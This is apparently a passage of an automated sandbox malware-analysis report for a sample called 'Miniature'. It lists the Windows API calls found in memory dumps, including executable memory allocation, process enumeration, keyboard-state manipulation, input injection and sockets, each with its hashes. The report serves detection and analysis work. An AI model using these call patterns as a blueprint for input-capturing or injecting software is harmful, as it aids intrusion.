                                                    • Part of subcall function 0100DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0100DEAE
                                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0100E9EA
                                                  • _memmove.LIBCMT ref: 0100E9FD
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                                  • String ID:
                                                  • API String ID: 3659485706-0
                                                  • Opcode ID: 91fde5711e4bae796191db7108c934092bbea76473b9acf6e5b0ffd55ed59710
                                                  • Instruction ID: 711da25eaa85a213a12ab5d7c6de0acd6e4a7f798f442e5cc53963d2c4753b92
                                                  • Opcode Fuzzy Hash: 91fde5711e4bae796191db7108c934092bbea76473b9acf6e5b0ffd55ed59710
                                                  • Instruction Fuzzy Hash: 54C17A716083019FD755DF28C88096ABBE4FF89714F04896EF8999B391D731E946CF82
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 010087AD
                                                  • CoUninitialize.OLE32 ref: 010087B8
                                                    • Part of subcall function 0101DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,01008A0E,?,00000000), ref: 0101DF71
                                                  • VariantInit.OLEAUT32(?), ref: 010087C3
                                                  • VariantClear.OLEAUT32(?), ref: 01008A94
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                  • String ID:
                                                  • API String ID: 780911581-0
                                                  • Opcode ID: ff38a23e5854048ccc2d61004e1d9c9215d11c073edf5b6a7912cdbe5cdc2572
                                                  • Instruction ID: 5fc298b51f3de25ce421f877700b1e1832c63e62f930cb60a792ad9287e5db0f
                                                  • Opcode Fuzzy Hash: ff38a23e5854048ccc2d61004e1d9c9215d11c073edf5b6a7912cdbe5cdc2572
                                                  • Instruction Fuzzy Hash: 7BA13975604B019FEB11EF54C881B2ABBE4BF99314F04884AF9959B3A1DB34FD41CB92
                                                  APIs
                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,01023C4C,?), ref: 00FE8308
                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,01023C4C,?), ref: 00FE8320
                                                  • CLSIDFromProgID.OLE32(?,?,00000000,01020988,000000FF,?,00000000,00000800,00000000,?,01023C4C,?), ref: 00FE8345
                                                  • _memcmp.LIBCMT ref: 00FE8366
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: FromProg$FreeTask_memcmp
                                                  • String ID:
                                                  • API String ID: 314563124-0
                                                  • Opcode ID: bed37d8f9514fcade2641851eceb584b0e88be4127f599ed217975a64b17711c
                                                  • Instruction ID: f3b30e7578002c27f71bd5629803d8b60c8aabe585f87cd1693e1f8169abc301
                                                  • Opcode Fuzzy Hash: bed37d8f9514fcade2641851eceb584b0e88be4127f599ed217975a64b17711c
                                                  • Instruction Fuzzy Hash: 9F811871A00109EFCB04DF95C984EEEB7B9FF89315F204598F50AAB250DB71AE06DB60
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Variant$AllocClearCopyInitString
                                                  • String ID:
                                                  • API String ID: 2808897238-0
                                                  • Opcode ID: 290bc3b33eb54f945008d3efa834988100e77b63f6f31f1a62ece404a9d8ca41
                                                  • Instruction ID: 5babb7c1738a9b64ea3727f6fecf6f5d9fa10208accd8e416db16c5c5b7ecb64
                                                  • Opcode Fuzzy Hash: 290bc3b33eb54f945008d3efa834988100e77b63f6f31f1a62ece404a9d8ca41
                                                  • Instruction Fuzzy Hash: D15198316087829BDB24BF7ADC95B2DF3E5AF44318B30881FE546C72A1EB349840BB15
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 0100F526
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0100F534
                                                    • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                  • Process32NextW.KERNEL32(00000000,?), ref: 0100F5F4
                                                  • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0100F603
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                  • String ID:
                                                  • API String ID: 2576544623-0
                                                  • Opcode ID: 45894c0152d2a8aefca050b73de38f2caba144761cafb288b1914639763e8215
                                                  • Instruction ID: ed0c48f8a8b737c849748fcc89f63f9a384ec9cb959abd37ddbcecc4eb5655fe
                                                  • Opcode Fuzzy Hash: 45894c0152d2a8aefca050b73de38f2caba144761cafb288b1914639763e8215
                                                  • Instruction Fuzzy Hash: 9551A9B1108311AFE321EF24DC81EABBBE8FF99704F00491DF58597291EB74A905DB92
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                  • String ID:
                                                  • API String ID: 2782032738-0
                                                  • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                  • Instruction ID: 823e315d5c66afca2ac7cdb828842693dd1ccdbc0aad6d59538036becf04791c
                                                  • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                  • Instruction Fuzzy Hash: C3419531B007069BDB288E6BCA909EF7BA9AF84360B24816DE855C7642D774BD41AF44
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00FEA68A
                                                  • __itow.LIBCMT ref: 00FEA6BB
                                                    • Part of subcall function 00FEA90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00FEA976
                                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00FEA724
                                                  • __itow.LIBCMT ref: 00FEA77B
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$__itow
                                                  • String ID:
                                                  • API String ID: 3379773720-0
                                                  • Opcode ID: 386bf8e994b2590c0c26bafd5ab83cb21351eda51b80a452745f407db3e9bc7c
                                                  • Instruction ID: 81e83b743ebb58c7dced96de7ae83787c9de5b62679830923717a8c98ee4e59e
                                                  • Opcode Fuzzy Hash: 386bf8e994b2590c0c26bafd5ab83cb21351eda51b80a452745f407db3e9bc7c
                                                  • Instruction Fuzzy Hash: 3541A4B4E00248AFDF21EF55CC55BEE7BB9EF49760F050029F905A3281DB74A944DBA2
                                                  APIs
                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 010070BC
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 010070CC
                                                    • Part of subcall function 00F94D37: __itow.LIBCMT ref: 00F94D62
                                                    • Part of subcall function 00F94D37: __swprintf.LIBCMT ref: 00F94DAC
                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 01007130
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0100713C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$__itow__swprintfsocket
                                                  • String ID:
                                                  • API String ID: 2214342067-0
                                                  • Opcode ID: 855db19571efd3f7a98d2bc00bbf50a25d7cc9acfcda03ea98f34e8a822b021d
                                                  • Instruction ID: 14a566246648d23de4fab6684abb672fd1e36b8c991d354fe4fe782b64e15c4b
                                                  • Opcode Fuzzy Hash: 855db19571efd3f7a98d2bc00bbf50a25d7cc9acfcda03ea98f34e8a822b021d
                                                  • Instruction Fuzzy Hash: B541C6757003006FFB21AF28DC86F6E77E5AB14B14F048058FA959B3C2D779AC019B91
                                                  APIs
                                                  • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,01020980), ref: 01006B92
                                                  • _strlen.LIBCMT ref: 01006BC4
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: _strlen
                                                  • String ID:
                                                  • API String ID: 4218353326-0
                                                  • Opcode ID: 1bbfff849af613a1003c72094d40d30b462e495f7511b18de5ef91226b8093ac
                                                  • Instruction ID: be2563f531cd9028f844ffe7a1c4206ef80993ad6146c9eafa420ecb9181b5b4
                                                  • Opcode Fuzzy Hash: 1bbfff849af613a1003c72094d40d30b462e495f7511b18de5ef91226b8093ac
                                                  • Instruction Fuzzy Hash: 1D412671A00209AFEB15FB64CC91EFEB7AAEF54310F008154F84A9B2D2DB35AD11DB50
                                                  APIs
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 01018F03
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: InvalidateRect
                                                  • String ID:
                                                  • API String ID: 634782764-0
                                                  • Opcode ID: 3f2c7d9af44e29d7a72ecc235fe9dc111f128ce9422bfaa79729096d65db9ce4
                                                  • Instruction ID: aec4f0ae0af804ef5835b3b04ba5ea8c1280a2cd3c77fb5ce0c98e1971baffd1
                                                  • Opcode Fuzzy Hash: 3f2c7d9af44e29d7a72ecc235fe9dc111f128ce9422bfaa79729096d65db9ce4
                                                  • Instruction Fuzzy Hash: FE31B034600209EEEF759A18CC48BAD3BE6EB09320F54854BFBD5D61A9C779E740CB51
                                                  APIs
                                                  • ClientToScreen.USER32(?,?), ref: 0101B1D2
                                                  • GetWindowRect.USER32(?,?), ref: 0101B248
                                                  • PtInRect.USER32(?,?,0101C6BC), ref: 0101B258
                                                  • MessageBeep.USER32(00000000), ref: 0101B2C9
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                  • String ID:
                                                  • API String ID: 1352109105-0
                                                  • Opcode ID: 6c782fa70e9b8c14c5056296ad60f8e9019a183af2581c4aa2c44a2da9e48bb0
                                                  • Instruction ID: ea15d49b67f6bf78cf56dc61a8b612ab848bfad6a0e9cb77b36ae12274ac3926
                                                  • Opcode Fuzzy Hash: 6c782fa70e9b8c14c5056296ad60f8e9019a183af2581c4aa2c44a2da9e48bb0
                                                  • Instruction Fuzzy Hash: 8C41AD30A00219DFDB22CF98C484AED7BF5FF49310F1480A9E9989B259D739E849CB50
                                                  APIs
                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00FF1326
                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00FF1342
                                                  • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00FF13A8
                                                  • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00FF13FA
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: KeyboardState$InputMessagePostSend
                                                  • String ID:
                                                  • API String ID: 432972143-0
                                                  • Opcode ID: cac14cdbb5659c73d158265463f469d145c25a700882a5cf8715b1b59ef73ae5
                                                  • Instruction ID: f1be767c7801cde72d1a7a2b4e47a8c50fc4ef556dc8529e8cf3b6a74895d230
                                                  • Opcode Fuzzy Hash: cac14cdbb5659c73d158265463f469d145c25a700882a5cf8715b1b59ef73ae5
                                                  • Instruction Fuzzy Hash: 84312630D4421CEAFB31CA258809BBA7BA9BF45320F14425AF6D052AF5D3798945AB51
                                                  APIs
                                                  • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00FF1465
                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00FF1481
                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 00FF14E0
                                                  • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00FF1532
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: KeyboardState$InputMessagePostSend
                                                  • String ID:
                                                  • API String ID: 432972143-0
                                                  • Opcode ID: 6b92a76d025cdbf497654b74bbdd2f04c7a7f39cc316cb8ed77e241e7c3edd83
                                                  • Instruction ID: 98e5227c6565575ec9b01bd3879b29208b9fb4972e6f4795b13b938da12e9f18
                                                  • Opcode Fuzzy Hash: 6b92a76d025cdbf497654b74bbdd2f04c7a7f39cc316cb8ed77e241e7c3edd83
                                                  • Instruction Fuzzy Hash: 0C312831D4021DDEFF34CA658C04BFABBA6BFC6330F18431AE691521E5D3798945AB61
                                                  APIs
                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00FC642B
                                                  • __isleadbyte_l.LIBCMT ref: 00FC6459
                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FC6487
                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FC64BD
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                  • String ID:
                                                  • API String ID: 3058430110-0
                                                  • Opcode ID: af3d2eec5cc2d68fa1611e51841053ca5c69fde1d24449c496f75aa9697ad0c5
                                                  • Instruction ID: 0a5c28fb141049b132ebe03ba3ac06964e14caa5760750f8b52028ca0a921786
                                                  • Opcode Fuzzy Hash: af3d2eec5cc2d68fa1611e51841053ca5c69fde1d24449c496f75aa9697ad0c5
                                                  • Instruction Fuzzy Hash: E131AF31A08257AFDB29CE65CD46FAA7BA9FF40320F25402DF864D7191DB35E850EB50
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 0101553F
                                                    • Part of subcall function 00FF3B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FF3B4E
                                                    • Part of subcall function 00FF3B34: GetCurrentThreadId.KERNEL32 ref: 00FF3B55
                                                    • Part of subcall function 00FF3B34: AttachThreadInput.USER32(00000000,?,00FF55C0), ref: 00FF3B5C
                                                  • GetCaretPos.USER32(?), ref: 01015550
                                                  • ClientToScreen.USER32(00000000,?), ref: 0101558B
                                                  • GetForegroundWindow.USER32 ref: 01015591
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                  • String ID:
                                                  • API String ID: 2759813231-0
                                                  • Opcode ID: de99b98c1081ff7395c1efcf2f1bf0c95b22faea1e49594118f8531231813f58
                                                  • Instruction ID: 59dbc2ece9a4225b30a5c9236edaca52d4ea4fc63fd3de9e4e6d250ddce7f4c8
                                                  • Opcode Fuzzy Hash: de99b98c1081ff7395c1efcf2f1bf0c95b22faea1e49594118f8531231813f58
                                                  • Instruction Fuzzy Hash: 13312D71900208AFDB10EFB5DC85DEFB7F9EF98304F10406AE555E7241EA79AE059BA0
                                                  APIs
                                                    • Part of subcall function 00F929E2: GetWindowLongW.USER32(?,000000EB), ref: 00F929F3
                                                  • GetCursorPos.USER32(?), ref: 0101CB7A
                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00FCBCEC,?,?,?,?,?), ref: 0101CB8F
                                                  • GetCursorPos.USER32(?), ref: 0101CBDC
                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00FCBCEC,?,?,?), ref: 0101CC16
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                  • String ID:
                                                  • API String ID: 2864067406-0
                                                  • Opcode ID: 8bdd36ca4ce1b7ea84965d32e5b47a72c7daf816f97b3a57e665d844f7448103
                                                  • Instruction ID: 2c0344268a4ec32b09a35bd0a03cc971b16f2f77b551424bd7154a3e65b2ea73
                                                  • Opcode Fuzzy Hash: 8bdd36ca4ce1b7ea84965d32e5b47a72c7daf816f97b3a57e665d844f7448103
                                                  • Instruction Fuzzy Hash: 4231C134600118AFEB658F58CC84EBB7FF5FB09710F444099FA8597269C3399951FBA0
                                                  APIs
                                                  • __setmode.LIBCMT ref: 00FB0BE2
                                                    • Part of subcall function 00FA402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00FF7E51,?,?,00000000), ref: 00FA4041
                                                    • Part of subcall function 00FA402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00FF7E51,?,?,00000000,?,?), ref: 00FA4065
                                                  • _fprintf.LIBCMT ref: 00FB0C19
                                                  • OutputDebugStringW.KERNEL32(?), ref: 00FE694C
                                                    • Part of subcall function 00FB4CCA: _flsall.LIBCMT ref: 00FB4CE3
                                                  • __setmode.LIBCMT ref: 00FB0C4E
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
